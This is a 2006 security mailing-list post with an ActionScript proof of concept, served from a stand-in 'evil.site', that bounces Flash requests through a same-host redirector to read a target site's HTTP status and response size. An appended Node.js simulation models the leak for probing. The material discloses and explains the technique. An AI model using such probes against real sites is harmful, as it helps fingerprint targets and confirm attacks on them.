
Re: [WEB SECURITY] JavaScript Malware, port scanning, and beyond



On 31 Jul 2006 at 15:30, Jeremiah Grossman wrote:

> 
> Hey, maybe! That's why I posted the limitations, they just might cause  
> someone to become interested. I don't have the test environment set up  
> to try it myself. Let us know what you find.
> 

Another cute thing which is possible with Flash is getting the explicit HTTP status code of 
a GET request, as well as the Content-Length (though I think the latter is only possible 
when the status is 200?). The trick is as follows:

There's a method of the LoadVars class, called sendAndLoad. It can be used to send a 
request to a URL and receive the response data. However, it is of course severely limited 
by the "same host" Flash policy. That is, if you send a request to a URL whose host is 
different from the host the Flash movie is from, you cannot access any property of the 
response, including of course the response data. 

However, I noticed that there's an interesting exception. If the requested URL resides on 
the same host, yet it redirects to a second URL on a different host, then the response 
status and response Content-Length are made available (but not the body, alas...).

Here's the Flash code (assume http://www.evil.site/attack.swf):

// attack.swf is served from http://www.evil.site, so redir.cgi is a "same host" URL
var req:LoadVars=new LoadVars();
var resp:LoadVars=new LoadVars();
// onData fires once the response has been received
resp.onData=
	function(body:String)
	{
		// probably works only if the HTTP status is 200
		getURL("javascript:alert('length is: "+resp.getBytesTotal()+"');","_blank");
		// note that the data argument is undefined for URLs not in the same host
	};
// onHTTPStatus fires with the status code of the response
resp.onHTTPStatus=
	function(httpStatus:Number)
	{
		getURL("javascript:alert('HTTP status is: "+httpStatus+"');","_blank");
	};
// the request goes to the same-host redirector, which 302s to the cross-host target
req.sendAndLoad("http://www.evil.site/redir.cgi",resp);

where http://www.evil.site/redir.cgi should redirect (via HTTP 302 redirection response) to 
http://www.target.site/some/path/to/page.ext?params

Knowing the response status and the response size may aid fingerprinting and can even tell 
whether an attack succeeded or not. 

Unfortunately, this doesn't help much with the basic authentication issue (not beyond the 
first Flash technique I described earlier in this thread) - if the authentication fails, a 
browser pop-up is displayed.

YMMV note: the above was tested with IE 6.0 and Flash 8.

Enjoy BH,
-Amit
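
The technique described in the message above, as an added example that is not part of
the original post or of any Flash code: a stand-alone Node.js model of the leak. The raw
HTTP responses, the host names (www.evil.site, www.target.site), the redirector's
`?url=` parameter and the policy rules (status always exposed, byte total only on 200,
body only when the final URL is still on the movie's host) are assumptions taken from the
post's description, not Flash's actual implementation; the point is to show what an
attacker gets back per probed URL and what stays hidden.

```javascript
// Added example (not from the original post): a model of LoadVars.sendAndLoad
// bouncing through a same-host redirector. Responses below are constructed;
// the "same host" policy is modelled as the post describes it.

const MOVIE_HOST = 'www.evil.site';                        // where attack.swf lives
const REDIRECTOR = 'http://www.evil.site/redir.cgi?url=';  // assumed same-host redirector
const MAX_REDIRECTS = 5;

// Constructed responses: two cross-host target pages and one same-host file.
const RESPONSES = {
  'http://www.target.site/admin/':
    'HTTP/1.1 200 OK\r\nContent-Type: text/html\r\nContent-Length: 1234\r\n\r\n' + 'x'.repeat(1234),
  'http://www.target.site/missing':
    'HTTP/1.1 404 Not Found\r\nContent-Length: 17\r\n\r\n<h1>not here</h1>',
  'http://www.evil.site/local.txt':
    'HTTP/1.1 200 OK\r\nContent-Length: 5\r\n\r\nhello',
};

// Resolve one URL to a raw response. The redirector synthesises a 302 to the
// URL given in its query string; everything else comes from the table.
function fetchRaw(url) {
  if (url.startsWith(REDIRECTOR)) {
    const target = decodeURIComponent(url.slice(REDIRECTOR.length));
    return 'HTTP/1.1 302 Found\r\nLocation: ' + target + '\r\nContent-Length: 0\r\n\r\n';
  }
  if (!(url in RESPONSES)) throw new Error('no constructed response for ' + url);
  return RESPONSES[url];
}

// Parse a raw HTTP/1.x response into status, lower-cased headers and body.
function parseResponse(raw) {
  const sep = raw.indexOf('\r\n\r\n');
  const headLines = raw.slice(0, sep).split('\r\n');
  const m = /^HTTP\/1\.[01] (\d{3})/.exec(headLines[0]);
  if (!m) throw new Error('bad status line: ' + headLines[0]);
  const headers = {};
  for (const line of headLines.slice(1)) {
    const i = line.indexOf(':');
    if (i > 0) headers[line.slice(0, i).trim().toLowerCase()] = line.slice(i + 1).trim();
  }
  return { status: Number(m[1]), headers, body: raw.slice(sep + 4) };
}

// Model of sendAndLoad under the "same host" policy as the post describes it:
// the player follows redirects, the caller then sees the final status, the
// byte total only when that status is 200, and the body only when the final
// URL is still on the movie's own host.
function sendAndLoad(startUrl, movieHost = MOVIE_HOST) {
  let url = startUrl;
  let resp = parseResponse(fetchRaw(url));
  for (let hops = 0; resp.status >= 300 && resp.status < 400 && resp.headers.location; hops++) {
    if (hops >= MAX_REDIRECTS) throw new Error('too many redirects from ' + startUrl);
    url = new URL(resp.headers.location, url).href;   // Location may be relative
    resp = parseResponse(fetchRaw(url));
  }
  const sameHost = new URL(url).host === movieHost;
  const length = resp.headers['content-length'];
  return {
    finalUrl: url,
    httpStatus: resp.status,                                             // onHTTPStatus
    bytesTotal: resp.status === 200                                      // getBytesTotal
      ? Number(length !== undefined ? length : resp.body.length)
      : undefined,
    data: sameHost ? resp.body : undefined,                              // onData argument
  };
}

// What the attacker does with it: bounce a list of cross-host URLs through the
// same-host redirector and collect (status, size) per URL for fingerprinting.
function probe(targetUrls, movieHost = MOVIE_HOST) {
  return targetUrls.map((t) => {
    const r = sendAndLoad(REDIRECTOR + encodeURIComponent(t), movieHost);
    return { url: t, httpStatus: r.httpStatus, bytesTotal: r.bytesTotal, bodyLeaked: r.data !== undefined };
  });
}

console.log(probe(['http://www.target.site/admin/', 'http://www.target.site/missing']));
```

The `probe` output is the attacker's whole take: a status and a size per cross-host URL, never a body. The same-host file (`local.txt`) is included only to show the contrast, since there the body comes through as normal.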

----------------------------------------------------------------------------
The Web Security Mailing List: 
http://www.webappsec.org/lists/websecurity/

The Web Security Mailing List Archives: 
http://www.webappsec.org/lists/websecurity/archive/
http://www.webappsec.org/rss/websecurity.rss [RSS Feed]



Brought to you by http://www.webappsec.org